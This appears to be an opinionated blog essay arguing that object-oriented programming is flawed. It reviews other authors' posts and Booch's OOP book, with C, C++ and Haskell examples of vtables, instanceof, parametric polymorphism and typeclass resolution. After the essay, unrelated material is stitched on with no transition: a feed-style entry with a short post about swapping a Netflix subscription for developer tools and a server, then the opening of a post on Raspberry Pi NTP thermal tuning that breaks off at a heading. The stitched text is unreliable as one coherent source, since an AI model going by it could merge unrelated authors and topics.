Elm has become a laughing stock. They skipped typeclasses in hopes that something better appears. So far they're still waiting for it and they got full libraries. They've done plenty of things to make it simple for a beginner but when it comes to retaining users, LOL. The language enforces its own best practices and it's getting to your way by limiting the size of tuples that you can make, tripping your homogeneous coordinate construction, and banning undefined/absurd in release.

Here's absurd from Idris, so you get some idea what they prevent in release.

absurd : Uninhabited t => t -> a

Non-dependent languages don't have this, but they got undefined for the same purpose. Elm has this too but it's in debug module and prevents its use in release. It's very fun to wrap the function into a maybe and handle it without the maybe monad, or come up with a placeholder value, when you know for certain that it's something that means the program has something very badly wrong if it happens. Nah, it's Nothing , tells Elm!

Why OOP is bad

Konrad Musial tells how he used to be excited about OOP. He learned about circles and ellipses as objects with properties. This is a story about struggling to understand OOP. As an example he throws in a bit of C#. Glancing at this code, it's not particularly complex but sprinkled with attributes like this [Serializable] here.

[Serializable]
public class SampleClass {}

These aren't technically even OOP. They're C#'s way to give code additional declarations and structure that can be used for metaprogramming. It's one of the flagship features of C#, something you should definitely know how to use if you're going to use that language.

The post is filled with popular anti-OOP quotes and in the end he tells us he figured it out and went back to doing OOP. A week or two later he wrote "Why OOP is Awesome". That you don't understand something doesn't mean it's flawed or bad.

This one is a prose-formed text and it's not the only one. I struggled to go through these despite them being the shortest in the bunch. It requires that I read the whole text through in one go. I just recently figured out myself the pieces I was missing for writing effortlessly skimmable texts . I don't say that I perfected it but you're reading one text that's been almost written in this style.

OOP is dead

Karsten Wagner thinks OOP reached its peak and is on the decline. Interest is increasing toward functional programming languages and concepts such as closures and continuations. To respond, languages that used to be "OO" have begun to integrate new features into themselves.

  1. States new features do not necessarily ease software development.
  2. There will be too many features and mixing them up will be worse than using handful of them consistently.
  3. Functional programming is doing it better, there pattern matching replaces multiple dispatch.
  4. Thinks OOP failed to live up to its promise and lists few reasons.
  5. Shills multiple dispatch as a solution to float~int conversion in addition.
  6. You can use relational data models instead of wrapping things into objects.
  7. Believes people start using OOP-languages in non-OOP way.
  8. It's possible to write interactive programs without having mutation of data. Mentions Monads.
  9. Boasts referential transparency as the important thing about functional programming.

List of reasons why he thinks OOP failed to live up to its promise:

  1. "this" -parameter in the method call is too special. Mentions problems that arise when you have to act on multiple parameters.
  2. Points out you can't give your own .trimLeft to a String -class when you don't implement the String class. You got to create String.trimLeft instead.
  3. Tells about monkey-patching in Python; adding things into a class as an afterthought brings up its own problems.
  4. Picks mutable state issues up. Points out mishandling of mutable state doesn't happen often in OOP, but when it does it's making up for that in how wrecking it is.
  5. Optimization of OOP code increases its complexity a lot.
  6. Object-hierarchies may end up being cyclic, forming structures that are very difficult to maintain. States you can handle this with tooling but questions whether the complexity is necessary.

I think in certain groups use of OOP has declined. There are a lot more people who understand type theory and formal verification than there were 14 years ago. Haskell finally ranks #40 on TIOBE index!

In big scale OOP is doing just great because there are more programmers than ever! They're going through Uncle Bob's night reading, learning about design patterns, SOLID and everything else OOP that sounds great. It is also great time for OOP in programming languages. Popular languages such as Javascript and Python are steered by their communities in a democratic resolution that relies on dialogue.

I was also in the belief that people would start using OOP languages in a non-OOP way but that hasn't entirely happened yet. Here we are still discussing OOP and we haven't gotten over it yet.

The rigidity of methods given to a class is a real problem but it's usually ignored. Maybe it's not seen as a big problem because you have to import your own trimLeft from a module anyway.

When you write interactive programs with monads, it doesn't go the way that mutation would disappear. Monadic IO pushes the mutable structures to the edges of the program but you still have them or something like it. I've explained this in "Understand IO Monad and implement it yourself in Haskell" .

He seems to think that pattern matching would replace multiple dispatch, but it doesn't actually work that way. Multiple dispatch doesn't really work either, and the worst part is that this only becomes apparent, and gets worse, after you rely on it more. I tried that in my Lever programming language and it went badly.

At least we've figured out already 14 years ago that referential transparency is important! I'm glad about that. Now we just need to get somebody to chant "mathematical expressions!" in front of developers.

The Case Against OOP is Wildly Overstated

Matthew MacDonald's take is that you can't rule without attracting enemies. Just look at all these blog posts by various people and more behind the curtains.

  1. Doubts that sloppy design practices and fuzzy architectural thinking would be unavoidable parts of OOP.
  2. States, correctly, that OOP isn't supposed to model the real world.
  3. Object-relational mapping is exemplified as an antipattern.
  4. Eloquent Javascript advice: Pick the simplest approach that meets the need.
  5. States that software design is hard to do right, no matter the tools.
  6. Design patterns can result in a mess, tells to instead focus on the Don't Repeat Yourself and You Ain't Gonna Need It, Law of Demeter (restrict what classes must know about each other), and valuing simplicity and readability above all else.
  7. Points OOP inheritance is the weakest link and attacked often. They're right, be careful of using it.
  8. OOP doesn't prevent you from applying the wrong solution to a problem.
  9. We'll see if Go and Rust steals the crown in the next decade.
  10. Agrees that OOP is indeed fading in domination, probably.

I got relatively little to say about this post itself. The title has been chosen fairly well as it accurately presents the author's opinion, sans wildly. The author actually seems to agree there's a case against OOP although he says it's overstated.

I'm glad people finally figured out that ORM sucks.

There's the usual claim that OOP isn't supposed to model the real world. This came up in the OOP/anti-OOP discussion when it became more apparent that people followed what they were taught in a rather strict manner. Then came the pretense that you weren't supposed to follow what you were taught. I still remember my own principled OOP-calculator written in C++. Hah. I remember how somebody commended it in IRC. They're all wrong about it either way. Forming a taxonomical model is ok if it participates in solving the problem at hand.

The advice about not blaming your tools is good advice, don't blame your tools... leave that to me. I am a professional tool-blamer!

Grady Booch's book: Object-oriented Analysis and Design with Applications

According to Quora, the 4 pillars of OOP are claimed to originate from the book "Object-oriented Analysis and Design with Applications" by Grady Booch, published by Addison-Wesley Professional in 1990.

Highlights:

  1. There are well-done comical illustrations sprinkled through.
  2. He already addresses the thing about categorical hierarchies in this book. The book talks about identifying key abstractions . It was already recognized here that plain taxonomies don't work for abstraction, simply because there are multiple of them that are all valid.
  3. Probably something else interesting would be in there if I bothered to read deeper.
  4. It's better than many later OOP books. It comes with a long references section and a large glossary.

I got my hands on the second edition published in 1994 and I looked in to see what Booch means with abstraction, encapsulation, inheritance and polymorphism.

I'm also interested in how the book treats class/object structures and programming languages. If I were smarter than I am, I might have gone deeper in this regard.

4 pillars of OOP

I don't bother to search deep into this book but at least there's a glossary. It explains these terms! We can't treat any book as a foundation anyway, but we get some reference points.

abstraction ""The essential characteristics of an object that distinguish it from all other kinds of objects and thus provide crisply-defined conceptual boundaries relative to the perspective of the viewer; the process of focusing upon the essential characteristics of an object. Abstraction is one of the fundamental objects of the object model.""

encapsulation ""The process of compartmentalizing the elements of an abstraction that constitute its structure and behavior; encapsulation serves to separate the contractual interface of an abstraction and its implementation.""

inheritance ""A relationship among classes, wherein one class shares the structure or behavior defined in one (single inheritance) or more (multiple inheritance) other classes. Inheritance defines an "is-a" hierarchy among classes in which a subclass inherits from one or more generalized superclasses; a subclass typically specializes its superclasses by augmenting or redefining existing structure and behavior.""

polymorphism ""A concept in type theory, according to which a name (such as variable declaration) may denote objects of many different classes that are related by some common superclass; thus, any object denoted by this name is able to respond to some common set of operations in different ways.""

What does Booch think of OOP these days? There's an interview with Booch from 2009 . Back then the guy still admitted to using Java and PHP with Eclipse.

Booch's treatment of programming languages

There's a list in the book: Wegner's classification of the more popular high-order programming languages into generations, arranged according to the language features they first introduced:

First-Generation languages

  1. FORTRAN I (mathematical expressions)
  2. ALGOL 58 (mathematical expressions)
  3. Flowmatic (mathematical expressions)
  4. IPL V (mathematical expressions)

Second-generation languages:

  1. FORTRAN II (subroutines, separate compilation)
  2. ALGOL 60 (Block structure, data types)
  3. COBOL (Data description, file handling)
  4. Lisp (List processing, pointers, garbage collection)

Third-generation languages:

  1. PL/1 (FORTRAN + ALGOL + COBOL)
  2. ALGOL 68 (Rigorous successor to ALGOL 60)
  3. Pascal (Simple successor to ALGOL 60)
  4. Simula (Classes, data abstraction)

The generation gap (1970-1980)

  1. Many different languages were invented, but few endured. [2]

I find the first-generation languages hilarious. They're right on the money if I'd believe this list was accurate. The positioning of Lisp is pretty funny as well.

I'm not sure, but perhaps Booch took the shape of the programming language for granted? "These are the means of abstraction I get and I better make best use of them". Unfortunately I didn't find any support for this idea, otherwise it'd settle the whole debate around OOP.

Otherwise I really like how this book is structured. It's a great example of a book, as the glossary and references section don't look like they were a caecum (a vestigial appendix). I'm likely returning to take more notes on how it delivers its content.

The delusion is strong binding force in Nounland

The whole point of this post is that hey,

  1. Inheritance was supposed to be an important pillar but now it's rolling on the floor?
  2. Are you sure about polymorphism? First of all you took it from type theory and that's itself getting popular featuring stable forms of parametric polymorphism, while your version of polymorphism is shifting shape like crazy.
  3. With only two pillars standing, OOP is seeming more of a balancing act rather than an architectural wonder it was supposed to be.
  4. There's a whole mobile phone software industry standing on Java which has heavy object oriented foundations.

When people start to move the poles around you might mistake the whole of object oriented programming for a circus performance. It's like musical chairs but played with foundational pillars.

It'd be a bit of irony to show the problems with examples from Booch's book, therefore all of the OOP examples here are from that book.

2020-08-03 Addendum to above: [hwayne] pointed out that ML cited CLU's type system as inspiration, which cited Simula as inspiration. From a historical perspective polymorphism has migrated from OOP to FP.

[hwayne]: https://lobste.rs/s/bmzgvz/case_against_oop_is_wildly_overstated#c_f7arfr

A record with an overinflated ego

Object oriented programming started from the need for greater customization of datatypes. The only form of customization used to come in the form of a record datatype.

struct PersonnelRecord
{
    char  name[100];
    int   socialSecurityNumber;
    char  department[10];
    float salary;
};

When it was recognized that you would want more abstraction and customization in datatypes, classes were born. Classes extend records by letting you define methods and structures that are shared between every object.

class PersonnelRecord {
public:
  char* employeeName() const;
  int   employeeSocialSecurityNumber() const;
  char* employeeDepartment() const;
protected:
  char  name[100];
  int   socialSecurityNumber;
  char  department[10];
  float salary;
};

It was considered good engineering practice to encapsulate the state of an object like this. When you separate the access to parameters like this, you can now change the implementation of the record into something else and nobody who is using this object needs to know how it's implemented.

The implementation of the feature was easy: karen.employeeName() just calls some function instead of directly accessing a field in the record. It was easy and much cheaper than other things you could do.

Very early on this also gave some namespace around the methods. When you really had nothing else, all this must have looked very great and minimal.

Today it's possible to put far more distance between you and the hardware than it was 30 years ago. Is there any reason why you should build abstractions over flat record structures now?

Inheritance & Polymorphism

I was going to write about inheritance and polymorphism entirely separately, but they're actually provided by the same structure. Inheritance enables the polymorphism.

A common use is to describe variance between different forms of records. It's presented in this example of a base class.

class TelemetryData {
public:
  TelemetryData();
  virtual ~TelemetryData();
  virtual void transmit();
  Time currentTime() const;

protected:
  int id;
  Time timeStamp;
};

The base class describes what you can do with the structure, as well as identifying the things that every structure shares. This structure is then extended to contain more information specific to a certain class of structures:

class ElectricalData : public TelemetryData {
public:
  ElectricalData(float v1, float v2, float a1, float a2);
  virtual ~ElectricalData();

  virtual void transmit();

  float currentPower() const;

protected:
  float fuelCell1Voltage, fuelCell2Voltage;
  float fuelCell1Amperes, fuelCell2Amperes;
};

The "virtual" methods are accessed through a virtual method table associated with each class. This results in a pointer that could be used to identify the class of an object so that it can be promoted. Using this approach is considered bad style because classes are supposed to be extensible. The pointer alone cannot be used to identify a class directly, because you may subclass any class and extend it, receiving a different vtable pointer for it. To identify vtables you have to be able to chain them.

What does it translate to?

Out of curiosity somebody may ask: how were classes simple to implement? There are several ways to implement classes/objects. You can implement them as a very thin layer above records.

Classes translate down into structures that each have a virtual table pointer in front of them. Note that the pointer is needed because a class extending from a structure may declare its own virtual methods.

struct EmptyClass {
    void *vtable;
};

struct TelemetryData {
    struct EmptyClass super;
    int id;
    Time timeStamp;
};

struct ElectricalData {
    struct TelemetryData super;
    float fuelCell1Voltage, fuelCell2Voltage;
    float fuelCell1Amperes, fuelCell2Amperes;
};

The statically dispatched (non-virtual) methods are referenced directly and translate to plain procedures like these.

/* Constructors and accessors take the object pointer explicitly. */
void TelemetryData_TelemetryData(TelemetryData*);
Time TelemetryData_currentTime(TelemetryData*);

void  ElectricalData_ElectricalData(ElectricalData*, float v1, float v2, float a1, float a2);
float ElectricalData_currentPower(ElectricalData*);

If something's declared virtual, it goes into a virtual method table.

struct EmptyClass_vtable {
    // void *vtableParent; /* If the dreaded 'instanceof' is implemented. */
};

struct TelemetryData_vtable {
    struct EmptyClass_vtable super;
    void (*deconstruct)(TelemetryData*);
    void (*transmit)(TelemetryData*);
};

struct ElectricalData_vtable {
    struct TelemetryData_vtable super;
};

/* One shared vtable instance per class. */
static struct TelemetryData_vtable  vtable_TelemetryData;
static struct ElectricalData_vtable vtable_ElectricalData;

It's easy to confuse the type of a vtable with the actual vtable, though this itself is not a flaw of any kind, and you don't need to worry about how classes and objects are implemented if they've been implemented correctly. Whenever an ElectricalData is constructed, the vtable pointer in it is set to point at (&vtable_ElectricalData) .

Closed/Open-definition structures and "instanceof"

Inheritance allows you to build both closed-definition and open-definition structures.

  1. Open-definition structures are structures that you can extend by deriving from them.
  2. Closed-definition structures are defined as a fixed bunch, and you assume what you receive is one of those known options. No further extension of the base class is expected.

These things should be kept separate because otherwise they tangle together. To avoid this, early OOP languages didn't have "instanceof", although they could have had it through vtables.

You create a closed structure by tagging it.

typedef enum {
    t_ElectricalData = 0,
    t_LightTracking,
    t_DoorLockData
} TelemetryTag;

Then you can require that when the telemetry tag is t_ElectricalData , the structure is either an ElectricalData or some subclass of it.

if (telem.tag == t_ElectricalData) {
    ElectricalData* elec = (ElectricalData*)telem;
    /* Do something with it.. */
}

This changed when Java introduced instanceof , which lets you take the convenient route and do it like this:

if (telem instanceof ElectricalData) {
    ElectricalData elec = (ElectricalData)telem;
    /* access elec */
}

instanceof immediately became a dreaded and abused feature of object oriented programming. I guess they added it because Java also introduced garbage collection, and this was an ancillary detail of an otherwise safer memory management scheme, or a newly available object-introspection tool. Ignorance of the problems introduced by this feature took care of the rest.

If you look this up and inform me why Java introduced instanceof, I could link the explanation here.

Fake abstraction

Slapping features together like this results in fragility on its own. The way these structures are used is tightly wound to how they're implemented by the compiler. This is not how abstraction is supposed to work, but I'll let you pretend it's intact out of courtesy.

This tradition of fake abstraction is carried on in Java and C#. They come with their own virtual machines and, instead of translating across multiple platforms like a well-typed and compiled language otherwise could, they refuse to work on anything other than the virtual machines provided along with them. In this regard you find a typed, compiled language that behaves just like an untyped language such as Python or Javascript.

Uncontrolled polymorphism

Virtual class methods provide polymorphism and allow you to select behavior at runtime. There's a bit of a problem, because this form of polymorphism is arbitrary. It means that you can do about anything without constraints. That would otherwise be a good thing, but you won't know which uses result in good behavior of the program. If you don't know that, then you might as well not have it.

Besides, the rules for building well-formed polymorphic programs in object oriented languages are complex, involving ideas such as covariance and contravariance. It turns out that often neither you nor your superiors know exactly how an OO program should use polymorphism. You still use this feature though!

Covariance and Contravariance

Object oriented programming builds on subtyping. Subtyping means that when somebody asks for a Cat, you can give him a CatDog and he gets to interface with the Cat part. You can pass in more information than is exactly required, and likewise you may be answered with more information than you requested.

Types get an ordering based on how much "information" they contain. When this ordering is preserved, things are said to be covariant, e.g. somebody provides a Cat and you want an Animal. If the ordering is reversed, such as when an Animal has to be passed in and you provide a Cat, then it's contravariant. It's bivariant if it needs to both pass and receive Cats. It's invariant if it's irrelevant whether it's a Cat.

These things are very easy to confuse to the point that I'm not sure if I just did. If you get them wrong then your polymorphism just blows up.
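
To make the two directions concrete, here's a minimal Haskell sketch (names are illustrative only; since Haskell has no subtyping, the "a Cat is an Animal" relation is encoded as an explicit conversion function): producers vary covariantly, consumers contravariantly.

data Animal = Animal String
newtype Cat = Cat String

-- The subtype relation, written out as a plain conversion.
catIsAnimal :: Cat -> Animal
catIsAnimal (Cat name) = Animal name

-- Covariance: anything that produces a Cat also serves as a producer of Animals.
covariant :: (e -> Cat) -> (e -> Animal)
covariant produce = catIsAnimal . produce

-- Contravariance: anything that accepts any Animal also serves as a consumer of Cats.
contravariant :: (Animal -> r) -> (Cat -> r)
contravariant consume = consume . catIsAnimal

main :: IO ()
main = do
  let Animal n = covariant (const (Cat "Felix")) ()
  putStrLn n                                                     -- "Felix"
  print (contravariant (\(Animal a) -> length a) (Cat "Felix"))  -- 5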

Parametric polymorphism

There's a fairly simple way to write well-behaving polymorphic programs. The trick is to enforce that polymorphic programs treat their polymorphic parts uniformly. When polymorphic programs aren't allowed to look inside the structures they manipulate, it's well-defined how they're manipulating those structures. This is known as parametric polymorphism, and it's the common style of polymorphism in functional programming languages. For example, when you meet a function such as:

a → a

You know that the function cannot access the insides of a in any way; the value must pass through untouched. However, when you add a function argument like this:

(a → a) → (a → a)

You know that a function of this type may send the a through the supplied function zero or more times. It's much easier to operate on and reason about objects that are consistently what they need to be.
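
As a minimal Haskell sketch of this point (nothing here comes from the original post): the type a -> a admits essentially only the identity, and (a -> a) -> (a -> a) can only feed the value through the supplied function some number of times.

-- The only total function of type a -> a is the identity;
-- the type gives it no way to inspect or rebuild the value.
keep :: a -> a
keep x = x

-- A function of this type can only apply the supplied function
-- zero or more times to the value it receives.
twice :: (a -> a) -> (a -> a)
twice f = f . f

main :: IO ()
main = do
  print (keep (42 :: Int))         -- 42
  print (twice (+ 1) (40 :: Int))  -- 42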

Features that break parametric polymorphism

The neat thing about parametric polymorphism is that if it ends up broken, it's the programming language designer's fault. It's no longer the programmer's fault.

The easiest way to break parametric polymorphism is to introduce an implicit monadic "join"; this also destroys the monad part of the construct.

maybe (maybe a)     → maybe a
promise (promise a) → promise a
array (array a)     → array a

The first one is often broken by introducing a Nothing constant and leaving out the Just(a) for convenience, or by giving an implicit Null to every structure constructed with a pointer so that it's easy to initialize. This makes it impossible to distinguish between Nothing and Just Nothing , which breaks parametric polymorphism on the variables wrapped with these structures. If maybe a or a? receives a "null" and a happens to be maybe something , then the higher-up structure catches the null. This is akin to the problems of instanceof, as the information in a is suddenly being identified and interpreted in an unpredictable way.
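
A minimal Haskell sketch of the Nothing versus Just Nothing point (names are illustrative): a real Maybe keeps the nesting apart, while a null-style collapse, which is exactly the implicit join above, erases the distinction.

import Data.Maybe (fromMaybe)

-- With a proper Maybe, a missing outer value and a present-but-empty
-- inner value stay distinguishable.
outerMissing, innerMissing :: Maybe (Maybe Int)
outerMissing = Nothing
innerMissing = Just Nothing

-- A null-style encoding performs the implicit join and collapses both.
collapse :: Maybe (Maybe Int) -> Maybe Int
collapse = fromMaybe Nothing

main :: IO ()
main = do
  print (outerMissing == innerMissing)                    -- False: information kept
  print (collapse outerMissing == collapse innerMissing)  -- True: information lost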

It's a lot less common to see the latter two broken. You might see arrays being broken in some early programming languages. The promise was broken in Javascript and there's a whole issue about it, the dreaded issue 94.

Why pattern matching doesn't dynamic dispatch

Since polymorphic programs in functional programming aren't allowed to look inside their parameters, pattern matching cannot be used to dispatch on polymorphic structures.

Patterns in a functional programming language are structures that have a closed definition. This means that their definition completely determines how many ways there are to construct them.

data Form = A | B | C

When the structure is examined, a well-formed program is required to handle every possible case that arises.

case form of
    A -> 1
    B -> 2
    C -> 3

This separation gives you a much simpler model for building programs. It partially replaces the inheritance of object oriented programming, though: you'll be able to create those closed-definition structures this way.

But how do they dynamic dispatch then?

Dynamic dispatch actually resembles passing modules or functions along with the arguments. Technically it's not any different from OOP, but the virtual table is an explicitly described construct.

You might have a record that provides a variety of ways to manipulate the structures; the a is a parameter that can be chosen by the user:

record Arithmetic a = {
    show    : a → string,
    (+)     : a → a → a,
    (-)     : a → a → a,
    literal : Integer → a }

These records can then be passed into a function that is abstracted over the arithmetic it does.

Arithmetic a → a → a

You may notice how it resembles the virtual table example earlier.
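
Here's a minimal executable Haskell version of that record-passing idea, assuming nothing beyond the sketch above (field names are renamed slightly to avoid clashing with the Prelude):

-- An explicit dictionary of operations, playing the role of the vtable.
data Arithmetic a = Arithmetic
  { render  :: a -> String
  , add     :: a -> a -> a
  , sub     :: a -> a -> a
  , literal :: Integer -> a
  }

-- A program written against the dictionary; it never inspects 'a' itself.
double :: Arithmetic a -> a -> a
double dict x = add dict x x

-- One possible dictionary, chosen by the caller.
intArithmetic :: Arithmetic Int
intArithmetic = Arithmetic show (+) (-) fromInteger

main :: IO ()
main = putStrLn (render intArithmetic (double intArithmetic 21))  -- "42"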

Better ways to do it

Functional programming is itself getting hijacked by the same consultants who rode the wave and pushed OOP. The things I'm going to present here should instead be taken as promotion, or shilling, of dependent type theory and formal-logic-based programming.

I left mutability out of the discussion because there are no additional problems with mutability when it comes to functional programming. The reason it's perceived as a problem is the precision functional programming requires from the programmer. Jean-Yves Girard and many other mathematicians took care of that a long while ago. Besides, if you immediately need what you already get from OOP, you can make a similar mess with mutable references in Haskell, for instance.

(Mis?)conception about types

There's an old conception around types that I was reminded of while reading Grady Booch's book, as I saw a picture of a dude trying to plug a statue of the number 3 into a hole. The statue was labeled with what it was signifying, and the hole signified something else.

The idea is that the use of types is to ensure you don't mix up things such as the "number of chickens" with "how much a chicken costs". That's almost a type-theoretic idea though. A better example would be mixing up 5 dollars and 5 euros.

The point of types, according to this explanation, would be that they prevent you from mixing things up. It's almost correct but slightly wrong. It also drives you to think of subtyping hierarchies like this:

dollar extends money
euro extends money

The example isn't giving types the attention they deserve though. It's an awful lot of effort to build separate number types just to verify that we don't mix up money units. Very few people are doing that.

Instead, there's another thing you might do with types. A type verifies that if you need some structure, then the given structure is indeed what you're expecting. We can exploit this property by asking for very fancy things and then demonstrating that we have them.

For example, you can construct a type that states that the sum of angles of a triangle is 180 degrees. The structure would be a proof that proves the proposition. Therefore when you have such a structure, then you know that in your model of a triangle the angles sum to 180 degrees.

Both procedural and functional programming languages alike allow some logical reasoning based on types. The difference is that from functional programming languages the step up to type theory is as easy as ABC.

Referential transparency

Referential transparency is a potential property of a computer program. A referentially transparent program can be replaced by its value without changing its behavior. Let's say that x and y are programs and you know they're equal; this is written as x = y . The meaning is the same as in mathematics: x and y have the same value. If both of them are referentially transparent, then you can rewrite x to y anywhere in the program, and vice versa.

For a programmer this mainly means that you need to separate side effects, or "behavior", from the reduction rules. In return it enables you to do equational reasoning! Equational reasoning is the thing where you chain equalities together to walk a trail in order to verify something, basically what everybody learnt in school.
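
As a small, purely illustrative Haskell example of equational reasoning under referential transparency:

double :: Int -> Int
double n = n + n

-- Because 'double 3' can always be replaced by its value, the whole
-- expression can be rewritten step by step like ordinary algebra:
--   double 3 + double 3  =  (3 + 3) + (3 + 3)  =  6 + 6  =  12
total :: Int
total = double 3 + double 3

main :: IO ()
main = print total  -- 12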

The multiple dispatch issues

Karsten proposed you'd do multiple dispatch. This used to be a popular idea. I think somebody figured out it was bad, but nobody listened to that guy. Anyway, if a programming language has multiple dispatch and it's used something like this:

add(int, int)
add(float, int)
add(int, float)
add(float, float)
...

I'd advise you to stay far away from it for your own good, unless you really know that it is extensible for real. Dynamic dispatch is too limited and becomes difficult with parametric types, which are inevitable if you do physics computations. It's very likely it won't support the needs of a computer algebra system, and it won't provide the interoperability you need.

To see where the problem is, just think about this: if int and float were separate modules that do not depend on each other, where should the (int,float) and (float,int) overloads be defined? Nowhere? Somewhere? In either one of the modules, but why?

Taxonomies, categorical hierarchies and maps

Modern OOP texts demonize these categorical hierarchies because they make the most embarrassing and entertaining counterexamples for object oriented programming. Taxonomies themselves aren't too bad. They only become problematic when you pretend there's only one valid way to group things together. That's an unusual problem to have unless you do OOP.

It's really similar to mappings or projections in this sense. A lot of effort has been spent to find different ways to flatten a globe so that you could create maps for it. Some projections preserve areas, others preserve distances or angles. People generally, except very few of us, do not have issues with interpreting maps.

Proper application of type theory doesn't punish you for picking just one taxonomy either: if a representation for something becomes inconvenient, you can switch to an isomorphic representation.

Usually isomorphism relates two functions like this:

f : a → b
g : b → a

They're shown to be isomorphic by verifying that their compositions are functions that do nothing: g.f is the identity on a and f.g is the identity on b .

It turns out isomorphisms allow you to switch between equivalent definitions. This means you don't need to stick to any specific categorization of things and treat it as an absolute representation. Putting a function in between that preserves the shape keeps it the same. A type-checked value is like a cat: it sits if it fits.
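
A minimal Haskell sketch of such an isomorphism (the two representations here are made up for illustration):

data Pair  = Pair Int Int                   deriving (Eq, Show)
data Point = Point { x :: Int, y :: Int }   deriving (Eq, Show)

f :: Pair -> Point
f (Pair a b) = Point a b

g :: Point -> Pair
g (Point a b) = Pair a b

-- g . f and f . g both behave as identities, so either representation
-- can be swapped in wherever the other one became inconvenient.
main :: IO ()
main = do
  print (g (f (Pair 1 2)) == Pair 1 2)      -- True
  print (f (g (Point 3 4)) == Point 3 4)    -- True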

Logic programming hidden in plain sight

This is here in case you still need some convincing that it's the EOL for the OOP paradigm. If you drop subtyping, then you lose the convenience of subtyping entirely. Though, in return you get something even more convenient back.

The types-as-propositions correspondence means that types are valid terms in a logic programming environment. This is already used in Haskell with typeclasses: instance declarations like these can be interpreted as logic programs. The Prolog version is similar to Haskell's corresponding program, except that in Haskell there's a construction tied to it. First come the Haskell instance declarations, and below them is the closest corresponding Prolog program.

instance Show String
instance Show Int
instance (Show a, Show b) => Show (a,b)
instance Show a => Show [a]

show(string).
show(int).
show(pair(A,B)) :- show(A), show(B).
show(list(A)) :- show(A).

When something queries for a type constraint such as (Show [(Int, String)]) , the GHC compiler can be interpreted as running a proof search where the returned "proof" is a fully constructed instance satisfying the constraint. The requirement for this kind of system to work well is that any result produced by the inference is as acceptable as any other result it could produce. To enforce this in Haskell, the functionality has been limited to something you can expect to produce a unique result. Still, there you see a computer building parts of the program for you because they're obvious.
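
As a small concrete illustration (not from the original post), evaluating show on a nested structure is what triggers that search:

-- Printing this value requires Show [(Int, String)]; GHC assembles it
-- from the instances for Int, strings, pairs, and lists, much like the
-- Prolog query show(list(pair(int, string))) would be resolved.
main :: IO ()
main = putStrLn (show [(1 :: Int, "one"), (2, "two")])
-- prints: [(1,"one"),(2,"two")]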

The similarity between Prolog and Haskell's type checker is not a new observation either. Thomas Hallgren wrote a paper about it, "Fun with Functional Dependencies" [pdf], 20 years ago. The paper illustrates how Haskell's type class system can be used to express decidable computations at compile time; the most elaborate example given there is a static implementation of insertion sort.

These features aren't easily "ported" to procedural or object oriented programming environments because they rely on the consistency that comes with stricter application of type theory.

Mathematical explanation for why OOP sucks big time

There's a potential mathematical reason for why OOP is giving us such a bad time and why we keep writing about it every once in a while. It has to do with the open-ended rules left in popular languages. When OOP languages come with a type system, they prevent you from doing some dumb things but still let you do a whole lot of idiotic things. It eventually results in code breaking when it's combined in different ways. This elicits a response from the programmer to cope with it, and he writes code with the strictest possible interfaces he can come up with.

You'll see that Java and C# even support this: they make it inconvenient to write abstract variables and convenient to throw in a few int s and float s, even though these are quite close to the machine implementation. 32-bit IEEE 754 floating point numbers do not satisfy the common algebraic laws you'd expect from real numbers, for instance. Integers are usually machine integers with a limited range, and they behave like modular arithmetic instead of the usual arithmetic. When you've selected a type like this, you've often closed off many other possible representations early on.

In functional programming you just say "a" if it's something that goes through your system intact. That's as abstract as it can be and allows many different variations of the same program to be constructed for very little effort.

What you can get for the price of a Netflix subscription

Hacker News
nmil.dev
2025-11-25 06:39:36
Comments...
Original Article

A couple of weeks ago, I decided to do away with my Netflix subscription. I simply was barely using it, and whenever I did it was more out of habit than it really being the thing I wanted to do with my time. Sure, there's still some decent stuff on there, but the vast majority of it feels absolutely moneyballed. Good, but somehow too good , and with no character.

As much as I'd love to elaborate on why I think Netflix is evil, that's not today's topic. What I wanted to share is how, for approximately the price I was paying for my subscription (€19.99), I've snapped up three subscriptions that I'm using on a daily basis. They're all pretty much interchangeable with other alternatives. The main thing I want to highlight is the individual slot they each fill for me.

1. A subscription to Zed Pro (~€10)

Frankly, I haven't really put too much thought into whether the unit economics are the best here. The main point is, these are €10 that make my coding experience more pleasant, and get me writing more code in my spare time. In that sense it's money well spent.

Does it matter if you get a Cursor subscription, or a Zed one, or whatever else is in vogue when you're reading? No, just get the thing that will get you excited to get your hands on the keyboard! To me, Zed feels more intentionally built than the VSClones: things flow nicely, it feels snappy, the ui is less cluttered... It's just nice .

Editor preferences aside, the main takeaway is: invest in a hobby you actively engage in. Make it that little bit more appealing and you have one more reason to be spending your time doing the thing that makes you feel good, rather than letting a couple hours a day evaporate watching another forgettable show.

2. A Kagi subscription (~€5/month)

I think we can mostly agree Google kind of sucks nowadays. Whenever I search, I automatically scroll down to skip the sponsored posts and SEO-maxxed websites, and still don't fully trust what I get. Maybe that's why we all started appending “reddit” to the end of our searches.

Are the search results themselves better with Kagi? To be honest, I can't tell yet, others have written far more informed takes on the topic. What does it for me is the simple fact of being able to pay directly for a service that I use, and value, rather than having to trade my attention in and endure a wall of ads. Especially if it's something I use over and over, every day. That's what I mean to highlight here: we can support products that we enjoy by paying for them (who would have thought?) rather than letting them lobotomize us via ad feeds.

3. A cheap server on Hetzner (~€4/month)

Again, the choice of provider here is secondary. The point is, I finally have my little stake on the internet. It's relatively barebones, and I like that. It forces me to learn and engage. In fact, that is where my blog is hosted!

So to sum it up: We don't have to default to a streaming subscription because that's become the standard human-being thing to do. For the same money you can build a suite of useful, well crafted tools that help you:

  • Get the most out of your hobbies
  • Spend less time looking at ads
  • Build things you can share with the world

P.S. Not one word here was written by AI. I plan on keeping it that way for anything that goes on this blog. So, if anything reads like slop, it's my slop :)

Most Stable Raspberry Pi? 81% Better NTP with Thermal Management

Hacker News
austinsnerdythings.com
2025-11-25 06:35:59
Comments...
Original Article

I’ve written before about building microsecond-accurate NTP servers with Raspberry Pi and GPS PPS, and more recently about revisiting the setup in 2025. Both posts focused on the hardware setup and basic configuration to achieve sub-microsecond time synchronization using GPS Pulse Per Second (PPS) signals.

But there was a problem. Despite having a stable PPS reference, my NTP server’s frequency drift was exhibiting significant variation over time. After months (years) of monitoring the system with Grafana dashboards, I noticed something interesting: the frequency oscillations seemed to correlate with CPU temperature changes. The frequency would drift as the CPU heated up during the day and cooled down at night, even though the PPS reference remained rock-solid.

Like clockwork (no pun intended), I somehow get sucked back into trying to improve my setup every 6-8 weeks. This post is the latest on that never-ending quest.

This post details how I achieved an 81% reduction in frequency variability and 77% reduction in frequency standard deviation through a combination of CPU core pinning and thermal stabilization. Welcome to Austin’s Nerdy Things, where we solve problems that 99.999% of people (and 99% of datacenters) don’t have.

The Problem: Thermal-Induced Timing Jitter

